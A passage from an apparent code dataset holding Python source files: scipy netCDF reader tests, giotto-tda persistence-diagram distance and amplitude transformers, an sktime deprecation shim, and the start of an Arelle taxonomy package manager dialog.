fobj:\n with netcdf_file(fobj) as f:\n # by default, don't use mmap for file-like\n assert_(not f.use_mmap)\n check_simple(f)\n\n # Read file from fileobj, with mmap\n with open('simple.nc', 'rb') as fobj:\n with netcdf_file(fobj, mmap=True) as f:\n assert_(f.use_mmap)\n check_simple(f)\n\n # Again read it in append mode (adding another att)\n with open('simple.nc', 'r+b') as fobj:\n with netcdf_file(fobj, 'a') as f:\n assert_(not f.use_mmap)\n check_simple(f)\n f.createDimension('app_dim', 1)\n var = f.createVariable('app_var', 'i', ('app_dim',))\n var[:] = 42\n\n # And... check that app_var made it in...\n with netcdf_file('simple.nc') as f:\n check_simple(f)\n assert_equal(f.variables['app_var'][:], 42)\n\n except:\n os.chdir(cwd)\n shutil.rmtree(tmpdir)\n raise\n os.chdir(cwd)\n shutil.rmtree(tmpdir)\n\n\ndef test_read_write_sio():\n eg_sio1 = BytesIO()\n with make_simple(eg_sio1, 'w') as f1:\n str_val = eg_sio1.getvalue()\n\n eg_sio2 = BytesIO(str_val)\n with netcdf_file(eg_sio2) as f2:\n check_simple(f2)\n\n # Test that error is raised if attempting mmap for sio\n eg_sio3 = BytesIO(str_val)\n assert_raises(ValueError, netcdf_file, eg_sio3, 'r', True)\n # Test 64-bit offset write / read\n eg_sio_64 = BytesIO()\n with make_simple(eg_sio_64, 'w', version=2) as f_64:\n str_val = eg_sio_64.getvalue()\n\n eg_sio_64 = BytesIO(str_val)\n with netcdf_file(eg_sio_64) as f_64:\n check_simple(f_64)\n assert_equal(f_64.version_byte, 2)\n # also when version 2 explicitly specified\n eg_sio_64 = BytesIO(str_val)\n with netcdf_file(eg_sio_64, version=2) as f_64:\n check_simple(f_64)\n assert_equal(f_64.version_byte, 2)\n\n\ndef test_read_example_data():\n # read any example data files\n for fname in glob(pjoin(TEST_DATA_PATH, '*.nc')):\n with netcdf_file(fname, 'r') as f:\n pass\n with netcdf_file(fname, 'r', mmap=False) as f:\n pass\n\n\ndef test_itemset_no_segfault_on_readonly():\n # Regression test for ticket #1202.\n # Open the test file in read-only mode.\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n\n filename = pjoin(TEST_DATA_PATH, 'example_1.nc')\n with netcdf_file(filename, 'r') as f:\n time_var = f.variables['time']\n\n # time_var.assignValue(42) should raise a RuntimeError--not seg. fault!\n assert_raises(RuntimeError, time_var.assignValue, 42)\n\n\ndef test_write_invalid_dtype():\n dtypes = ['int64', 'uint64']\n if np.dtype('int').itemsize == 8: # 64-bit machines\n dtypes.append('int')\n if np.dtype('uint').itemsize == 8: # 64-bit machines\n dtypes.append('uint')\n\n with netcdf_file(BytesIO(), 'w') as f:\n f.createDimension('time', N_EG_ELS)\n for dt in dtypes:\n assert_raises(ValueError, f.createVariable, 'time', dt, ('time',))\n\n\ndef test_flush_rewind():\n stream = BytesIO()\n with make_simple(stream, mode='w') as f:\n x = f.createDimension('x',4)\n v = f.createVariable('v', 'i2', ['x'])\n v[:] = 1\n f.flush()\n len_single = len(stream.getvalue())\n f.flush()\n len_double = len(stream.getvalue())\n\n assert_(len_single == len_double)\n\n\ndef test_dtype_specifiers():\n # Numpy 1.7.0-dev had a bug where 'i2' wouldn't work.\n # Specifying np.int16 or similar only works from the same commit as this\n # comment was made.\n with make_simple(BytesIO(), mode='w') as f:\n f.createDimension('x',4)\n f.createVariable('v1', 'i2', ['x'])\n f.createVariable('v2', np.int16, ['x'])\n f.createVariable('v3', np.dtype(np.int16), ['x'])\n\n\ndef test_ticket_1720():\n io = BytesIO()\n\n items = [0,0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9]\n\n with netcdf_file(io, 'w') as f:\n f.history = 'Created for a test'\n f.createDimension('float_var', 10)\n float_var = f.createVariable('float_var', 'f', ('float_var',))\n float_var[:] = items\n float_var.units = 'metres'\n f.flush()\n contents = io.getvalue()\n\n io = BytesIO(contents)\n with netcdf_file(io, 'r') as f:\n assert_equal(f.history, b'Created for a test')\n float_var = f.variables['float_var']\n assert_equal(float_var.units, b'metres')\n assert_equal(float_var.shape, (10,))\n assert_allclose(float_var[:], items)\n\n\ndef test_mmaps_segfault():\n filename = pjoin(TEST_DATA_PATH, 'example_1.nc')\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"error\")\n with netcdf_file(filename, mmap=True) as f:\n x = f.variables['lat'][:]\n # should not raise warnings\n del x\n\n def doit():\n with netcdf_file(filename, mmap=True) as f:\n return f.variables['lat'][:]\n\n # should not crash\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n x = doit()\n x.sum()\n\n\ndef test_zero_dimensional_var():\n io = BytesIO()\n with make_simple(io, 'w') as f:\n v = f.createVariable('zerodim', 'i2', [])\n # This is checking that .isrec returns a boolean - don't simplify it\n # to 'assert not ...'\n assert v.isrec is False, v.isrec\n f.flush()\n\n\ndef test_byte_gatts():\n # Check that global \"string\" atts work like they did before py3k\n # unicode and general bytes confusion\n with in_tempdir():\n filename = 'g_byte_atts.nc'\n f = netcdf_file(filename, 'w')\n f._attributes['holy'] = b'grail'\n f._attributes['witch'] = 'floats'\n f.close()\n f = netcdf_file(filename, 'r')\n assert_equal(f._attributes['holy'], b'grail')\n assert_equal(f._attributes['witch'], b'floats')\n f.close()\n\n\ndef test_open_append():\n # open 'w' put one attr\n with in_tempdir():\n filename = 'append_dat.nc'\n f = netcdf_file(filename, 'w')\n f._attributes['Kilroy'] = 'was here'\n f.close()\n\n # open again in 'a', read the att and and a new one\n f = netcdf_file(filename, 'a')\n assert_equal(f._attributes['Kilroy'], b'was here')\n f._attributes['naughty'] = b'Zoot'\n f.close()\n\n # open yet again in 'r' and check both atts\n f = netcdf_file(filename, 'r')\n assert_equal(f._attributes['Kilroy'], b'was here')\n assert_equal(f._attributes['naughty'], b'Zoot')\n f.close()\n\n\ndef test_append_recordDimension(): \n dataSize = 100 \n \n with in_tempdir():\n # Create file with record time dimension\n with netcdf_file('withRecordDimension.nc', 'w') as f:\n f.createDimension('time', None)\n f.createVariable('time', 'd', ('time',))\n f.createDimension('x', dataSize)\n x = f.createVariable('x', 'd', ('x',))\n x[:] = np.array(range(dataSize))\n f.createDimension('y', dataSize)\n y = f.createVariable('y', 'd', ('y',))\n y[:] = np.array(range(dataSize))\n f.createVariable('testData', 'i', ('time', 'x', 'y')) \n f.flush()\n f.close() \n \n for i in range(2): \n # Open the file in append mode and add data \n with netcdf_file('withRecordDimension.nc', 'a') as f:\n f.variables['time'].data = np.append(f.variables[\"time\"].data, i)\n f.variables['testData'][i, :, :] = np.ones((dataSize, dataSize))*i\n f.flush()\n \n # Read the file and check that append worked\n with netcdf_file('withRecordDimension.nc') as f: \n assert_equal(f.variables['time'][-1], i)\n assert_equal(f.variables['testData'][-1, :, :].copy(), np.ones((dataSize, dataSize))*i)\n assert_equal(f.variables['time'].data.shape[0], i+1)\n assert_equal(f.variables['testData'].data.shape[0], i+1)\n \n # Read the file and check that 'data' was not saved as user defined\n # attribute of testData variable during append operation\n with netcdf_file('withRecordDimension.nc') as f:\n with assert_raises(KeyError) as ar: \n f.variables['testData']._attributes['data']\n ex = ar.exception\n assert_equal(ex.args[0], 'data')\n\ndef test_maskandscale():\n t = np.linspace(20, 30, 15)\n t[3] = 100\n tm = np.ma.masked_greater(t, 99)\n fname = pjoin(TEST_DATA_PATH, 'example_2.nc')\n with netcdf_file(fname, maskandscale=True) as f:\n Temp = f.variables['Temperature']\n assert_equal(Temp.missing_value, 9999)\n assert_equal(Temp.add_offset, 20)\n assert_equal(Temp.scale_factor, np.float32(0.01))\n found = Temp[:].compressed()\n del Temp # Remove ref to mmap, so file can be closed.\n expected = np.round(tm.compressed(), 2)\n assert_allclose(found, expected)\n\n with in_tempdir():\n newfname = 'ms.nc'\n f = netcdf_file(newfname, 'w', maskandscale=True)\n f.createDimension('Temperature', len(tm))\n temp = f.createVariable('Temperature', 'i', ('Temperature',))\n temp.missing_value = 9999\n temp.scale_factor = 0.01\n temp.add_offset = 20\n temp[:] = tm\n f.close()\n\n with netcdf_file(newfname, maskandscale=True) as f:\n Temp = f.variables['Temperature']\n assert_equal(Temp.missing_value, 9999)\n assert_equal(Temp.add_offset, 20)\n assert_equal(Temp.scale_factor, np.float32(0.01))\n expected = np.round(tm.compressed(), 2)\n found = Temp[:].compressed()\n del Temp\n assert_allclose(found, expected)\n\n\n# ------------------------------------------------------------------------\n# Test reading with masked values (_FillValue / missing_value)\n# ------------------------------------------------------------------------\n\ndef test_read_withValuesNearFillValue():\n # Regression test for ticket #5626\n fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')\n with netcdf_file(fname, maskandscale=True) as f:\n vardata = f.variables['var1_fillval0'][:]\n assert_mask_matches(vardata, [False, True, False])\n\ndef test_read_withNoFillValue():\n # For a variable with no fill value, reading data with maskandscale=True\n # should return unmasked data\n fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')\n with netcdf_file(fname, maskandscale=True) as f:\n vardata = f.variables['var2_noFillval'][:]\n assert_mask_matches(vardata, [False, False, False])\n assert_equal(vardata, [1,2,3])\n\ndef test_read_withFillValueAndMissingValue():\n # For a variable with both _FillValue and missing_value, the _FillValue\n # should be used\n IRRELEVANT_VALUE = 9999\n fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')\n with netcdf_file(fname, maskandscale=True) as f:\n vardata = f.variables['var3_fillvalAndMissingValue'][:]\n assert_mask_matches(vardata, [True, False, False])\n assert_equal(vardata, [IRRELEVANT_VALUE, 2, 3])\n\ndef test_read_withMissingValue():\n # For a variable with missing_value but not _FillValue, the missing_value\n # should be used\n fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')\n with netcdf_file(fname, maskandscale=True) as f:\n vardata = f.variables['var4_missingValue'][:]\n assert_mask_matches(vardata, [False, True, False])\n\ndef test_read_withFillValNaN():\n fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')\n with netcdf_file(fname, maskandscale=True) as f:\n vardata = f.variables['var5_fillvalNaN'][:]\n assert_mask_matches(vardata, [False, True, False])\n\ndef test_read_withChar():\n fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')\n with netcdf_file(fname, maskandscale=True) as f:\n vardata = f.variables['var6_char'][:]\n assert_mask_matches(vardata, [False, True, False])\n\ndef test_read_with2dVar():\n fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')\n with netcdf_file(fname, maskandscale=True) as f:\n vardata = f.variables['var7_2d'][:]\n assert_mask_matches(vardata, [[True, False], [False, False], [False, True]])\n\ndef test_read_withMaskAndScaleFalse():\n # If a variable has a _FillValue (or missing_value) attribute, but is read\n # with maskandscale set to False, the result should be unmasked\n fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')\n # Open file with mmap=False to avoid problems with closing a mmap'ed file\n # when arrays referring to its data still exist:\n with netcdf_file(fname, maskandscale=False, mmap=False) as f:\n vardata = f.variables['var3_fillvalAndMissingValue'][:]\n assert_mask_matches(vardata, [False, False, False])\n assert_equal(vardata, [1, 2, 3])\n\nif __name__ == \"__main__\":\n run_module_suite()\n"} {"ext": "py", "sha": "1a305550a608959717cee6136d21d1063fef06a4", "content": "# License: Apache 2.0\n\nimport numpy as np\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.utils.validation import check_is_fitted\n\nfrom ._metrics import _parallel_pairwise, _parallel_amplitude\nfrom ._utils import _discretize\nfrom ..utils.validation import check_diagram, validate_params, \\\n validate_metric_params\n\n\nclass PairwiseDistance(BaseEstimator, TransformerMixin):\n \"\"\"`Distances `_ between pairs of persistence\n diagrams, constructed from the distances between their respective\n subdiagrams with constant homology dimension.\n\n Given two collections of persistence diagrams consisting of\n birth-death-dimension triples [b, d, q], a collection of distance\n matrices or a single distance matrix between pairs of diagrams is\n calculated according to the following steps:\n\n 1. All diagrams are partitioned into subdiagrams corresponding to\n distinct homology dimensions.\n 2. Pairwise distances between subdiagrams of equal homology\n dimension are calculated according to the parameters `metric` and\n `metric_params`. This gives a collection of distance matrices,\n :math:`\\\\mathbf{D} = (D_{q_1}, \\\\ldots, D_{q_n})`.\n 3. The final result is either :math:`\\\\mathbf{D}` itself as a\n three-dimensional array, or a single distance matrix constructed\n by taking norms of the vectors of distances between diagram pairs.\n\n Parameters\n ----------\n metric : ``'bottleneck'`` | ``'wasserstein'`` | ``'landscape'`` | \\\n ``'betti'`` | ``'heat'``, optional, default: ``'bottleneck'``\n Distance or dissimilarity function between subdiagrams:\n\n - ``'bottleneck'`` and ``'wasserstein'`` refer to the identically named\n perfect-matching--based notions of distance.\n - ``'landscape'`` refers to the :math:`L^p` distance between\n persistence landscapes.\n - ``'betti'`` refers to the :math:`L^p` distance between Betti curves.\n - ``'heat'`` refers to the :math:`L^p` distance between\n Gaussian-smoothed diagrams.\n\n metric_params : dict or None, optional, default: ``None``\n Additional keyword arguments for the metric function:\n\n - If ``metric == 'bottleneck'`` the only argument is `delta` (float,\n default: ``0.01``). When equal to ``0.``, an exact algorithm is\n used; otherwise, a faster approximate algorithm is used.\n - If ``metric == 'wasserstein'`` the available arguments are `p`\n (int, default: ``2``) and `delta` (float, default: ``0.01``).\n Unlike the case of ``'bottleneck'``, `delta` cannot be set to\n ``0.`` and an exact algorithm is not available.\n - If ``metric == 'betti'`` the available arguments are `p` (float,\n default: ``2.``) and `n_values` (int, default: ``100``).\n - If ``metric == 'landscape'`` the available arguments are `p`\n (float, default: ``2.``), `n_values` (int, default: ``100``) and\n `n_layers` (int, default: ``1``).\n - If ``metric == 'heat'`` the available arguments are `p`\n (float, default: ``2.``), `sigma` (float, default: ``1.``) and\n `n_values` (int, default: ``100``).\n\n order : float or None, optional, default: ``2.``\n If ``None``, :meth:`transform` returns for each pair of diagrams a\n vector of distances corresponding to the dimensions in\n :attr:`homology_dimensions_`. Otherwise, the :math:`p`-norm of\n these vectors with :math:`p` equal to `order` is taken.\n\n n_jobs : int or None, optional, default: ``None``\n The number of jobs to use for the computation. ``None`` means 1 unless\n in a :obj:`joblib.parallel_backend` context. ``-1`` means using all\n processors.\n\n Attributes\n ----------\n effective_metric_params_ : dict\n Dictionary containing all information present in `metric_params` as\n well as on any relevant quantities computed in :meth:`fit`.\n\n homology_dimensions_ : list\n Homology dimensions seen in :meth:`fit`, sorted in ascending order.\n\n See also\n --------\n Amplitude, BettiCurve, PersistenceLandscape, HeatKernel, \\\n giotto.homology.VietorisRipsPersistence\n\n Notes\n -----\n To compute distances without first splitting the computation between\n different homology dimensions, data should be first transformed by an\n instance of :class:`ForgetDimension`.\n\n `Hera `_ is used as a C++ backend\n for computing bottleneck and Wasserstein distances between persistence\n diagrams.\n\n \"\"\"\n _hyperparameters = {'order': [float, (1, np.inf)]}\n\n def __init__(self, metric='landscape', metric_params=None, order=2.,\n n_jobs=None):\n self.metric = metric\n self.metric_params = metric_params\n self.order = order\n self.n_jobs = n_jobs\n\n def fit(self, X, y=None):\n \"\"\"Store all observed homology dimensions in\n :attr:`homology_dimensions_` and compute\n :attr:`effective_metric_params`. Then, return the estimator.\n\n This method is there to implement the usual scikit-learn API and hence\n work in pipelines.\n\n Parameters\n ----------\n X : ndarray, shape (n_samples_fit, n_features, 3)\n Input data. Array of persistence diagrams, each a collection of\n triples [b, d, q] representing persistent topological features\n through their birth (b), death (d) and homology dimension (q).\n\n y : None\n There is no need for a target in a transformer, yet the pipeline\n API requires this parameter.\n\n Returns\n -------\n self : object\n\n \"\"\"\n X = check_diagram(X)\n if self.metric_params is None:\n self.effective_metric_params_ = {}\n else:\n self.effective_metric_params_ = self.metric_params.copy()\n\n hyperparameters = self.get_params().copy()\n if self.order is not None:\n if isinstance(self.order, int):\n hyperparameters['order'] = float(self.order)\n else:\n hyperparameters['order'] = 1. # Automatically pass validate_params\n\n validate_params(hyperparameters, self._hyperparameters)\n validate_metric_params(self.metric, self.effective_metric_params_)\n\n self.homology_dimensions_ = sorted(set(X[0, :, 2]))\n\n if self.metric in ['landscape', 'heat', 'betti']:\n self.effective_metric_params_['samplings'], \\\n self.effective_metric_params_['step_sizes'] = \\\n _discretize(X, **self.effective_metric_params_)\n\n self._X = X\n return self\n\n def transform(self, X, y=None):\n \"\"\"Computes a distance or vector of distances between the diagrams in\n `X` and the diagrams seen in :meth:`fit`.\n\n Parameters\n ----------\n X : ndarray, shape (n_samples, n_features, 3)\n Input data. Array of persistence diagrams, each a collection of\n triples [b, d, q] representing persistent topological features\n through their birth (b), death (d) and homology dimension (q).\n\n y : None\n There is no need for a target in a transformer, yet the pipeline\n API requires this parameter.\n\n Returns\n -------\n Xt : ndarray, shape (n_samples_fit, n_samples, n_homology_dimensions) \\\n if `order` is ``None``, else (n_samples_fit, n_samples)\n Distance matrix or collection of distance matrices between\n diagrams in `X` and diagrams seen in :meth:`fit`. In the\n second case, index i along axis 2 corresponds to the i-th\n homology dimension in :attr:`homology_dimensions_`.\n\n \"\"\"\n check_is_fitted(self, ['effective_metric_params_',\n 'homology_dimensions_'])\n X = check_diagram(X)\n\n if np.array_equal(X, self._X):\n X2 = None\n else:\n X2 = X\n\n Xt = _parallel_pairwise(self._X, X2, self.metric,\n self.effective_metric_params_,\n self.homology_dimensions_,\n self.n_jobs)\n if self.order is not None:\n Xt = np.linalg.norm(Xt, axis=2, ord=self.order)\n\n return Xt\n\n\nclass Amplitude(BaseEstimator, TransformerMixin):\n \"\"\"`Amplitudes `_ of persistence diagrams,\n constructed from the amplitudes of their subdiagrams with constant\n homology dimension.\n\n Given a single persistence diagram consisting of birth-death-dimension\n triples [b, d, q], a vector of amplitudes or a single scalar amplitude is\n calculated according to the following steps:\n\n 1. All diagrams are partitioned into subdiagrams corresponding to\n distinct homology dimensions.\n 2. The amplitude of each subdiagram is calculated according to the\n parameters `metric` and `metric_params`. This gives a vector of\n amplitudes, :math:`\\\\mathbf{a} = (a_{q_1}, \\\\ldots, a_{q_n})`.\n 3. The final result is either :math:`\\\\mathbf{a}` itself or\n a norm of :math:`\\\\mathbf{a}`.\n\n Parameters\n ----------\n metric : ``'bottleneck'`` | ``'wasserstein'`` | ``'landscape'`` | \\\n ``'betti'`` | ``'heat'``, optional, default: ``'bottleneck'``\n Distance or dissimilarity function used to define the amplitude of\n a subdiagram as its distance from the diagonal diagram:\n\n - ``'bottleneck'`` and ``'wasserstein'`` refer to the identically named\n perfect-matching--based notions of distance.\n - ``'landscape'`` refers to the :math:`L^p` distance between\n persistence landscapes.\n - ``'betti'`` refers to the :math:`L^p` distance between Betti curves.\n - ``'heat'`` refers to the :math:`L^p` distance between\n Gaussian-smoothed diagrams.\n\n metric_params : dict or None, optional, default: ``None``\n Additional keyword arguments for the metric function:\n\n - If ``metric == 'bottleneck'`` there are no available arguments.\n - If ``metric == 'wasserstein'`` the only argument is `p` (int,\n default: ``2``).\n - If ``metric == 'betti'`` the available arguments are `p` (float,\n default: ``2.``) and `n_values` (int, default: ``100``).\n - If ``metric == 'landscape'`` the available arguments are `p`\n (float, default: ``2.``), `n_values` (int, default: ``100``) and\n `n_layers` (int, default: ``1``).\n - If ``metric == 'heat'`` the available arguments are `p` (float,\n default: ``2.``), `sigma` (float, default: ``1.``) and `n_values`\n (int, default: ``100``).\n\n order : float or None, optional, default: ``2.``\n If ``None``, :meth:`transform` returns for each diagram a vector of\n amplitudes corresponding to the dimensions in\n :attr:`homology_dimensions_`. Otherwise, the :math:`p`-norm of\n these vectors with :math:`p` equal to `order` is taken.\n\n n_jobs : int or None, optional, default: ``None``\n The number of jobs to use for the computation. ``None`` means 1 unless\n in a :obj:`joblib.parallel_backend` context. ``-1`` means using all\n processors.\n\n Attributes\n ----------\n effective_metric_params_ : dict\n Dictionary containing all information present in `metric_params` as\n well as on any relevant quantities computed in :meth:`fit`.\n\n homology_dimensions_ : list\n Homology dimensions seen in :meth:`fit`, sorted in ascending order.\n\n See also\n --------\n PairwiseDistance, Scaler, Filtering, \\\n BettiCurve, PersistenceLandscape, \\\n HeatKernel, giotto.homology.VietorisRipsPersistence\n\n Notes\n -----\n To compute amplitudes without first splitting the computation between\n different homology dimensions, data should be first transformed by an\n instance of :class:`ForgetDimension`.\n\n \"\"\"\n _hyperparameters = {'order': [float, (1, np.inf)]}\n\n def __init__(self, metric='landscape', metric_params=None, order=2.,\n n_jobs=None):\n self.metric = metric\n self.metric_params = metric_params\n self.order = order\n self.n_jobs = n_jobs\n\n def fit(self, X, y=None):\n \"\"\"Store all observed homology dimensions in\n :attr:`homology_dimensions_` and compute\n :attr:`effective_metric_params`. Then, return the estimator.\n\n This method is there to implement the usual scikit-learn API and hence\n work in pipelines.\n\n Parameters\n ----------\n X : ndarray, shape (n_samples, n_features, 3)\n Input data. Array of persistence diagrams, each a collection of\n triples [b, d, q] representing persistent topological features\n through their birth (b), death (d) and homology dimension (q).\n\n y : None\n There is no need for a target in a transformer, yet the pipeline\n API requires this parameter.\n\n Returns\n -------\n self : object\n\n \"\"\"\n if self.metric_params is None:\n self.effective_metric_params_ = {}\n else:\n self.effective_metric_params_ = self.metric_params.copy()\n\n hyperparameters = self.get_params().copy()\n if self.order is not None:\n if isinstance(self.order, int):\n hyperparameters['order'] = float(self.order)\n else:\n hyperparameters['order'] = 1. # Automatically pass validate_params\n\n validate_params(hyperparameters, self._hyperparameters)\n validate_metric_params(self.metric, self.effective_metric_params_)\n X = check_diagram(X)\n self.homology_dimensions_ = sorted(set(X[0, :, 2]))\n\n if self.metric in ['landscape', 'heat', 'betti']:\n self.effective_metric_params_['samplings'], \\\n self.effective_metric_params_['step_sizes'] = \\\n _discretize(X, **self.effective_metric_params_)\n\n return self\n\n def transform(self, X, y=None):\n \"\"\"Compute the amplitudes or amplitude vectors of diagrams in `X`.\n\n Parameters\n ----------\n X : ndarray, shape (n_samples, n_features, 3)\n Input data. Array of persistence diagrams, each a collection of\n triples [b, d, q] representing persistent topological features\n through their birth (b), death (d) and homology dimension (q).\n\n y : None\n There is no need for a target in a transformer, yet the pipeline\n API requires this parameter.\n\n Returns\n -------\n Xt : ndarray, shape (n_samples, n_homology_dimensions) if `order` \\\n is ``None``, else (n_samples, 1)\n Amplitudes or amplitude vectors of the diagrams in `X`. In the\n second case, index i along axis 1 corresponds to the i-th\n homology dimension in :attr:`homology_dimensions_`.\n\n \"\"\"\n check_is_fitted(self, ['effective_metric_params_',\n 'homology_dimensions_'])\n X = check_diagram(X)\n\n Xt = _parallel_amplitude(X, self.metric,\n self.effective_metric_params_,\n self.homology_dimensions_,\n self.n_jobs)\n if self.order is None:\n return Xt\n Xt = np.linalg.norm(Xt, axis=1, ord=self.order).reshape(-1, 1)\n return Xt\n"} {"ext": "py", "sha": "1a30555e91c7bf3a42ad1f0b9aaf106f7a2e35f7", "content": "#!/usr/bin/env python3 -u\n# -*- coding: utf-8 -*-\n# copyright: sktime developers, BSD-3-Clause License (see LICENSE file)\n\"\"\"Implement transformers for summarizing a time series.\"\"\"\n\nimport warnings\n\nfrom sktime.transformations.series.summarize import WindowSummarizer\n\n__all__ = [\"WindowSummarizer\"]\n\nwarnings.warn(\n \"WindowSummarizer has been moved to transformations.series.summarize,\"\n + \" the old location in series.windows_summarize is deprecated since 0.11.0,\"\n + \" and will be removed in 0.12.0. Please use the import from \"\n + \"transformations.series.summarize import WindowSummarizer.\"\n)\n"} {"ext": "py", "sha": "1a30557d6404dbdd5f998bc2c989ed340e1a804c", "content": "'''\nCreated on Oct 6, 2013 (from DialogPluginManager.py)\n\n@author: Mark V Systems Limited\n(c) Copyright 2013 Mark V Systems Limited, All rights reserved.\n'''\nfrom tkinter import simpledialog, Toplevel, font, messagebox, VERTICAL, HORIZONTAL, N, S, E, W\nfrom tkinter.constants import DISABLED, ACTIVE\ntry:\n from tkinter.ttk import Treeview, Scrollbar, Frame, Label, Button\nexcept ImportError:\n from ttk import Treeview, Scrollbar, Frame, Label, Button\nfrom arelle import PackageManager, DialogURL\nfrom arelle.CntlrWinTooltip import ToolTip\nimport os, time\ntry:\n import regex as re\nexcept ImportError:\n import re\n\ndef dialogPackageManager(mainWin):\n # check for updates in background\n import threading\n thread = threading.Thread(target=lambda cntlr=mainWin: backgroundCheckForUpdates(cntlr))\n thread.daemon = True\n thread.start()\n\ndef backgroundCheckForUpdates(cntlr):\n cntlr.showStatus(_(\"Checking for updates to packages\")) # clear web loading status\n packageNamesWithNewerFileDates = PackageManager.packageNamesWithNewerFileDates()\n if packageNamesWithNewerFileDates:\n cntlr.showStatus(_(\"Updates are available for these packages: {0}\")\n .format(', '.join(packageNamesWithNewerFileDates)), clearAfter=5000)\n else:\n cntlr.showStatus(_(\"No updates found for packages.\"), clearAfter=5000)\n time.sleep(0.1) # Mac locks up without this, may be needed for empty ui queue? \n cntlr.uiThreadQueue.put((DialogPackageManager, [cntlr, packageNamesWithNewerFileDates]))\n\nclass DialogPackageManager(Toplevel):\n def __init__(self, mainWin, packageNamesWithNewerFileDates):\n super(DialogPackageManager, self).__init__(mainWin.parent)\n \n self.ENABLE = _(\"Enable\")\n self.DISABLE = _(\"Disable\")\n self.parent = mainWin.parent\n self.cntlr = mainWin\n \n # copy plugins for temporary display\n self.packagesConfig = PackageManager.packagesConfig\n self.packagesConfigChanged = False\n self.packageNamesWithNewerFileDates = packageNamesWithNewerFileDates\n \n parentGeometry = re.match(\"(\\d+)x(\\d+)[+]?([-]?\\d+)[+]?([-]?\\d+)\", self.parent.geometry())\n dialogX = int(parentGeometry.group(3))\n dialogY = int(parentGeometry.group(4))\n\n self.title(_(\"Taxonomy Packages Manager\"))\n frame = Frame(self)\n \n # left button frame\n buttonFrame = Frame(frame, width=40)\n buttonFrame.columnconfigure(0, weight=1)\n addLabel = Label(buttonFrame, text=_(\"Find taxonomy packages:\"), wraplength=64, justify=\"center\")\n addLocalButton = Button(buttonFrame, text=_(\"Locally\"), command=self.findLocally)\n ToolTip(addLocalButton, text=_(\"File chooser allows selecting taxonomy packages to add (or reload), from the local file system. \"\n \"Select either a PWD or prior taxonomy package zip file, or a taxonomy manifest (.taxonomyPackage.xml) within an unzipped taxonomy package. \"), wraplength=360)\n addWebButton = Button(buttonFrame, text=_(\"On Web\"), command=self.findOnWeb)\n ToolTip(addWebButton, text=_(\"Dialog to enter URL full path to load (or reload) package, from the web or local file system. \"\n \"URL may be either a PWD or prior taxonomy package zip file, or a taxonomy manifest (.taxonomyPackage.xml) within an unzipped taxonomy package. \"), wraplength=360)\n manifestNameButton = Button(buttonFrame, text=_(\"Manifest\"), command=self.manifestName)\n ToolTip(manifestNameButton, text=_(\"Provide pre-PWD non-standard archive manifest file name pattern (e.g., *taxonomyPackage.xml). \"\n \"Uses unix file name pattern matching. \"\n \"Multiple manifest files are supported in pre-PWD archives (such as oasis catalogs). \"\n \"(Replaces pre-PWD search for either .taxonomyPackage.xml or catalog.xml). \"), wraplength=480)\n self.manifestNamePattern = \"\"\n addLabel.grid(row=0, column=0, pady=4)\n addLocalButton.grid(row=1, column=0, pady=4)\n addWebButton.grid(row=2, column=0, pady=4)\n manifestNameButton.grid(row=3, column=0, pady=4)\n buttonFrame.grid(row=0, column=0, rowspan=3, sticky=(N, S, W), padx=3, pady=3)\n \n # right tree frame (packages already known to arelle)\n packagesFrame = Frame(frame, width=700)\n vScrollbar = Scrollbar(packagesFrame, orient=VERTICAL)\n hScrollbar = Scrollbar(packagesFrame, orient=HORIZONTAL)\n self.packagesView = Treeview(packagesFrame, xscrollcommand=hScrollbar.set, yscrollcommand=vScrollbar.set, height=7)\n self.packagesView.grid(row=0, column=0, sticky=(N, S, E, W))\n self.packagesView.bind('<>', self.packageSelect)\n hScrollbar[\"command\"] = self.packagesView.xview\n hScrollbar.grid(row=1, column=0, sticky=(E,W))\n vScrollbar[\"command\"] = self.packagesView.yview\n vScrollbar.grid(row=0, column=1, sticky=(N,S))\n packagesFrame.columnconfigure(0, weight=1)\n packagesFrame.rowconfigure(0, weight=1)\n packagesFrame.grid(row=0, column=1, columnspan=4, sticky=(N, S, E, W), padx=3, pady=3)\n self.packagesView.focus_set()\n\n self.packagesView.column(\"#0\", width=120, anchor=\"w\")\n self.packagesView.heading(\"#0\", text=_(\"Name\"))\n self.packagesView[\"columns\"] = (\"ver\", \"status\", \"date\", \"update\", \"descr\")\n self.packagesView.column(\"ver\", width=150, anchor=\"w\", stretch=False)\n self.packagesView.heading(\"ver\", text=_(\"Version\"))\n self.packagesView.column(\"status\", width=50, anchor=\"w\", stretch=False)\n self.packagesView.heading(\"status\", text=_(\"Status\"))\n self.packagesView.column(\"date\", width=170, anchor=\"w\", stretch=False)\n self.packagesView.heading(\"date\", text=_(\"File Date\"))\n self.packagesView.column(\"update\", width=50, anchor=\"w\", stretch=False)\n self.packagesView.heading(\"update\", text=_(\"Update\"))\n self.packagesView.column(\"descr\", width=200, anchor=\"w\", stretch=False)\n self.packagesView.heading(\"descr\", text=_(\"Description\"))\n\n remappingsFrame = Frame(frame)\n vScrollbar = Scrollbar(remappingsFrame, orient=VERTICAL)\n hScrollbar = Scrollbar(remappingsFrame, orient=HORIZONTAL)\n self.remappingsView = Treeview(remappingsFrame, xscrollcommand=hScrollbar.set, yscrollcommand=vScrollbar.set, height=5)\n self.remappingsView.grid(row=0, column=0, sticky=(N, S, E, W))\n hScrollbar[\"command\"] = self.remappingsView.xview\n hScrollbar.grid(row=1, column=0, sticky=(E,W))\n vScrollbar[\"command\"] = self.remappingsView.yview\n vScrollbar.grid(row=0, column=1, sticky=(N,S))\n remappingsFrame.columnconfigure(0, weight=1)\n remappingsFrame.rowconfigure(0, weight=1)\n remappingsFrame.grid(row=1, column=1, columnspan=4, sticky=(N, S, E, W), padx=3, pady=3)\n self.remappingsView.focus_set()\n \n self.remappingsView.column(\"#0\", width=200, anchor=\"w\")\n 